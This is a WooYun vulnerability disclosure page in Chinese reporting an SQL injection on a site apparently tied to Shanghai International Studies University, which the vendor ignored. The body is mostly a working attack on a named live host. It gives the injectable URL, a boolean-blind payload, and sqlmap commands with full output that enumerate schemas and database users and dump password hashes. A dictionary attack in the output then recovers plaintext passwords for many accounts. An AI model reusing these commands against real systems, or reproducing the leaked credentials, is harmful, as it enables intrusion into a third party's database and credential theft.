当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0172957

漏洞标题:上海外国语大学某站点存在SQL注入(已解密hash)

相关厂商:上海外国语大学

漏洞作者: hellokuku

提交时间:2016-01-27 09:45

修复时间:2016-02-01 09:50

公开时间:2016-02-01 09:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-27: 细节已通知厂商并且等待厂商处理中
2016-02-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT 上海外国语大学某站点存在SQL注入(已解密hash)

详细说明:

测试的时候发现上海外国语大学某站存在注入
注入点为 http://www.sinofltt.com/swpx/indexActivity_activityInfo.action?activity.id=202

漏洞证明:

sqlmap 跑

➜~» sqlmap -u 'http://www.sinofltt.com/swpx/indexActivity_activityInfo.action?activity.id=202' -v 1 --dbs --batch                               [22:00:22]
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 22:00:30
[22:00:30] [INFO] using '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session' as session file
[22:00:30] [INFO] resuming injection data from session file
[22:00:30] [INFO] resuming back-end DBMS 'oracle' from session file
[22:00:31] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: activity.id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: activity.id=202' AND 3416=3416 AND 'euuT'='euuT
---
[22:00:32] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[22:00:32] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[22:00:32] [INFO] fetching database (schema) names
[22:00:32] [INFO] fetching number of databases
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': 16
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': CTXSYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': DBSNMP
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': DMSYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': EXFSYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': MDSYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': OLAPSYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': ORDSYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': OUTLN
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SCOTT
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SWPX
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SYSMAN
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SYSTEM
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': TSMSYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': WMSYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': XDB
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SWPX
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[22:00:32] [INFO] Fetched data logged to text files under '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com'
[*] shutting down at: 22:00:32


跑users

sqlmap -u 'http://www.sinofltt.com/swpx/indexActivity_activityInfo.action?activity.id=202' -v 1 --users --batch                             [22:00:32]
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 22:00:41
[22:00:41] [INFO] using '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session' as session file
[22:00:41] [INFO] resuming injection data from session file
[22:00:41] [INFO] resuming back-end DBMS 'oracle' from session file
[22:00:41] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: activity.id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: activity.id=202' AND 3416=3416 AND 'euuT'='euuT
---
[22:00:41] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[22:00:41] [INFO] fetching database users
[22:00:41] [INFO] fetching number of database users
[22:00:41] [INFO] retrieved: 22
[22:00:50] [INFO] retrieved: SWPX
[22:01:13] [INFO] retrieved: SCOTT
[22:01:44] [INFO] retrieved: MGMT_VIEW
[22:02:26] [INFO] retrieved: MDDATA
[22:03:07] [INFO] retrieved: SYSMAN
[22:03:47] [INFO] retrieved: MDSYS
[22:04:16] [INFO] retrieved: SI_INFORMTN_SCHEMA
[22:05:38] [INFO] retrieved: ORDPLUGINS
[22:06:21] [INFO] retrieved: ORDSYS
[22:06:38] [INFO] retrieved: OLAPSYS
[22:07:03] [INFO] retrieved: ANONYMOUS
[22:07:36] [INFO] retrieved: XDB
[22:07:53] [INFO] retrieved: CTXSYS
[22:08:20] [INFO] retrieved: EXFSYS
[22:08:39] [INFO] retrieved: WMSYS
[22:08:59] [INFO] retrieved: DBSNMP
[22:09:23] [INFO] retrieved: TSMSYS
[22:09:52] [INFO] retrieved: DMSYS
[22:10:08] [INFO] retrieved: DIP
[22:10:26] [INFO] retrieved: OUTLN
[22:10:56] [INFO] retrieved: SYSTEM
[22:11:23] [INFO] retrieved: SYS
database management system users [22]:
[*] ANONYMOUS
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SWPX
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[22:11:34] [INFO] Fetched data logged to text files under '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com'


跑password

sqlmap -u 'http://www.sinofltt.com/swpx/indexActivity_activityInfo.action?activity.id=202' -v 1 --password --batch                          [22:11:34]
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 22:12:22
[22:12:22] [INFO] using '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session' as session file
[22:12:22] [INFO] resuming injection data from session file
[22:12:22] [INFO] resuming back-end DBMS 'oracle' from session file
[22:12:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: activity.id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: activity.id=202' AND 3416=3416 AND 'euuT'='euuT
---
[22:12:23] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[22:12:23] [INFO] fetching database users password hashes
[22:12:23] [INFO] fetching database users
[22:12:23] [INFO] fetching number of database users
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': 22
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SWPX
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SCOTT
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': MGMT_VIEW
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': MDDATA
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SYSMAN
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': MDSYS
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SI_INFORMTN_SCHEMA
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': ORDPLUGINS
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': ORDSYS
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': OLAPSYS
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': ANONYMOUS
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': XDB
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': CTXSYS
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': EXFSYS
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': WMSYS
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': DBSNMP
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': TSMSYS
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': DMSYS
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': DIP
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': OUTLN
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SYSTEM
[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SYS
[22:12:23] [INFO] fetching number of password hashes for user 'SWPX'
[22:12:23] [INFO] retrieved: 1
[22:12:24] [INFO] fetching password hashes for user 'SWPX'
[22:12:24] [INFO] retrieved: C0EB0101BE6122EE
[22:13:18] [INFO] fetching number of password hashes for user 'SCOTT'
[22:13:18] [INFO] retrieved: 1
[22:13:22] [INFO] fetching password hashes for user 'SCOTT'
[22:13:22] [INFO] retrieved: F894844C34402B67
[22:14:29] [INFO] fetching number of password hashes for user 'MGMT_VIEW'
[22:14:29] [INFO] retrieved: 1
[22:14:31] [INFO] fetching password hashes for user 'MGMT_VIEW'
[22:14:31] [INFO] retrieved: 4F538DF5F344F348
[22:15:32] [INFO] fetching number of password hashes for user 'MDDATA'
[22:15:32] [INFO] retrieved: 1
[22:15:35] [INFO] fetching password hashes for user 'MDDATA'
[22:15:35] [INFO] retrieved: DF02A496267DEE66
[22:16:46] [INFO] fetching number of password hashes for user 'SYSMAN'
[22:16:46] [INFO] retrieved: 1
[22:16:48] [INFO] fetching password hashes for user 'SYSMAN'
[22:16:48] [INFO] retrieved: A7098D3C71992379
[22:17:38] [INFO] fetching number of password hashes for user 'MDSYS'
[22:17:38] [INFO] retrieved: 1
[22:17:40] [INFO] fetching password hashes for user 'MDSYS'
[22:17:40] [INFO] retrieved: 72979A94BAD2AF[22:18:57] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
80
[22:19:09] [INFO] fetching number of password hashes for user 'SI_INFORMTN_SCHEMA'
[22:19:09] [INFO] retrieved: 1
[22:19:12] [INFO] fetching password hashes for user 'SI_INFORMTN_SCHEMA'
[22:19:12] [INFO] retrieved: 84B8CBCA4D477FA3
[22:20:01] [INFO] fetching number of password hashes for user 'ORDPLUGINS'
[22:20:01] [INFO] retrieved: 1
[22:20:02] [INFO] fetching password hashes for user 'ORDPLUGINS'
[22:20:02] [INFO] retrieved: 88A2B2C183431F00
[22:20:41] [INFO] fetching number of password hashes for user 'ORDSYS'
[22:20:41] [INFO] retrieved: 1
[22:20:43] [INFO] fetching password hashes for user 'ORDSYS'
[22:20:43] [INFO] retrieved: 7EFA02EC7EA6B86F
[22:21:36] [INFO] fetching number of password hashes for user 'OLAPSYS'
[22:21:36] [INFO] retrieved: 1
[22:21:37] [INFO] fetching password hashes for user 'OLAPSYS'
[22:21:37] [INFO] retrieved: 3FB8EF9DB538647C
[22:22:32] [INFO] fetching number of password hashes for user 'ANONYMOUS'
[22:22:32] [INFO] retrieved: 1
[22:22:34] [INFO] fetching password hashes for user 'ANONYMOUS'
[22:22:34] [INFO] retrieved: anonymous
[22:23:23] [INFO] fetching number of password hashes for user 'XDB'
[22:23:23] [INFO] retrieved: 1
[22:23:28] [INFO] fetching password hashes for user 'XDB'
[22:23:28] [INFO] retrieved: 88D8364765FCE6AF
[22:24:31] [INFO] fetching number of password hashes for user 'CTXSYS'
[22:24:31] [INFO] retrieved: 1
[22:24:37] [INFO] fetching password hashes for user 'CTXSYS'
[22:24:37] [INFO] retrieved: 71E687F036AD56E5
[22:25:31] [INFO] fetching number of password hashes for user 'EXFSYS'
[22:25:31] [INFO] retrieved: 1
[22:25:34] [INFO] fetching password hashes for user 'EXFSYS'
[22:25:34] [INFO] retrieved: 66F4EF5650C20355
[22:26:30] [INFO] fetching number of password hashes for user 'WMSYS'
[22:26:30] [INFO] retrieved: 1
[22:26:32] [INFO] fetching password hashes for user 'WMSYS'
[22:26:32] [INFO] retrieved: 7C9BA362F8314299
[22:27:28] [INFO] fetching number of password hashes for user 'DBSNMP'
[22:27:28] [INFO] retrieved: 1
[22:27:30] [INFO] fetching password hashes for user 'DBSNMP'
[22:27:30] [INFO] retrieved: 609A39BEE92031E5
[22:28:22] [INFO] fetching number of password hashes for user 'TSMSYS'
[22:28:22] [INFO] retrieved: 1
[22:28:26] [INFO] fetching password hashes for user 'TSMSYS'
[22:28:26] [INFO] retrieved: 3DF26A8B17D0F29F
[22:29:30] [INFO] fetching number of password hashes for user 'DMSYS'
[22:29:30] [INFO] retrieved: 1
[22:29:32] [INFO] fetching password hashes for user 'DMSYS'
[22:29:32] [INFO] retrieved: BFBA5A553FD9E28A
[22:30:43] [INFO] fetching number of password hashes for user 'DIP'
[22:30:43] [INFO] retrieved: 1
[22:30:44] [INFO] fetching password hashes for user 'DIP'
[22:30:44] [INFO] retrieved: CE4A36B8E06CA59C
[22:31:52] [INFO] fetching number of password hashes for user 'OUTLN'
[22:31:52] [INFO] retrieved: 1
[22:31:57] [INFO] fetching password hashes for user 'OUTLN'
[22:31:57] [INFO] retrieved: 4A3BA55E08595C81
[22:33:23] [INFO] fetching number of password hashes for user 'SYSTEM'
[22:33:23] [INFO] retrieved: 1
[22:33:28] [INFO] fetching password hashes for user 'SYSTEM'
[22:33:28] [INFO] retrieved: 027A661910F9FB9F
[22:34:28] [INFO] fetching number of password hashes for user 'SYS'
[22:34:28] [INFO] retrieved: 1
[22:34:29] [INFO] fetching password hashes for user 'SYS'
[22:34:29] [INFO] retrieved: 2C8781D6AA6A9A0C
[22:35:38] [INFO] do you want to use dictionary attack on retrieved password hashes? [Y/n/q] Y
[22:35:38] [INFO] using hash method: 'oracle_old_passwd'
[22:35:38] [INFO] what's the dictionary's location? [/usr/local/Cellar/sqlmap/0.9_1/libexec/txt/oracle-default-passwords.txt] /usr/local/Cellar/sqlmap/0.9_1/libexec/txt/oracle-default-passwords.txt
[22:35:38] [INFO] loading dictionary from: '/usr/local/Cellar/sqlmap/0.9_1/libexec/txt/oracle-default-passwords.txt'
[22:35:38] [INFO] do you want to use common password suffixes? (slow!) [y/N] N
[22:35:38] [INFO] starting dictionary attack (oracle_old_passwd)
[22:35:43] [INFO] found: 'ordsys' for user: 'ORDSYS'
[22:35:47] [INFO] found: 'manager' for user: 'OLAPSYS'
[22:35:57] [INFO] found: 'mddata' for user: 'MDDATA'
[22:36:05] [INFO] found: 'si_informtn_schema' for user: 'SI_INFORMTN_SCHEMA'
[22:36:06] [INFO] found: 'dip' for user: 'DIP'
[22:36:16] [INFO] found: 'outln' for user: 'OUTLN'
[22:36:17] [INFO] found: 'change_on_install' for user: 'XDB'
[22:36:19] [INFO] found: 'dmsys' for user: 'DMSYS'
[22:36:25] [INFO] found: 'change_on_install' for user: 'CTXSYS'
[22:36:29] [INFO] found: 'wmsys' for user: 'WMSYS'
[22:36:38] [INFO] found: 'ordplugins' for user: 'ORDPLUGINS'
[22:36:39] [INFO] found: 'exfsys' for user: 'EXFSYS'
[22:36:51] [INFO] found: 'mdsys' for user: 'MDSYS'
[22:36:54] [INFO] found: 'tiger' for user: 'SCOTT'
[22:37:00] [INFO] found: 'TSMSYS' for user: 'TSMSYS'
database management system users password hashes:
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] CTXSYS [1]:
    password hash: 71E687F036AD56E5
    clear-text password: change_on_install
[*] DBSNMP [1]:
    password hash: 609A39BEE92031E5
[*] DIP [1]:
    password hash: CE4A36B8E06CA59C
    clear-text password: dip
[*] DMSYS [1]:
    password hash: BFBA5A553FD9E28A
    clear-text password: dmsys
[*] EXFSYS [1]:
    password hash: 66F4EF5650C20355
    clear-text password: exfsys
[*] MDDATA [1]:
    password hash: DF02A496267DEE66
    clear-text password: mddata
[*] MDSYS [1]:
    password hash: 72979A94BAD2AF80
    clear-text password: mdsys
[*] MGMT_VIEW [1]:
    password hash: 4F538DF5F344F348
[*] OLAPSYS [1]:
    password hash: 3FB8EF9DB538647C
    clear-text password: manager
[*] ORDPLUGINS [1]:
    password hash: 88A2B2C183431F00
    clear-text password: ordplugins
[*] ORDSYS [1]:
    password hash: 7EFA02EC7EA6B86F
    clear-text password: ordsys
[*] OUTLN [1]:
    password hash: 4A3BA55E08595C81
    clear-text password: outln
[*] SCOTT [1]:
    password hash: F894844C34402B67
    clear-text password: tiger
[*] SI_INFORMTN_SCHEMA [1]:
    password hash: 84B8CBCA4D477FA3
    clear-text password: si_informtn_schema
[*] SWPX [1]:
    password hash: C0EB0101BE6122EE
[*] SYS [1]:
    password hash: 2C8781D6AA6A9A0C
[*] SYSMAN [1]:
    password hash: A7098D3C71992379
[*] SYSTEM [1]:
    password hash: 027A661910F9FB9F
[*] TSMSYS [1]:
    password hash: 3DF26A8B17D0F29F
    clear-text password: TSMSYS
[*] WMSYS [1]:
    password hash: 7C9BA362F8314299
    clear-text password: wmsys
[*] XDB [1]:
    password hash: 88D8364765FCE6AF
    clear-text password: change_on_install
[22:37:00] [INFO] Fetched data logged to text files under '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com'


就酱

修复方案:

fix issue

版权声明:转载请注明来源 hellokuku@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-01 09:50

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无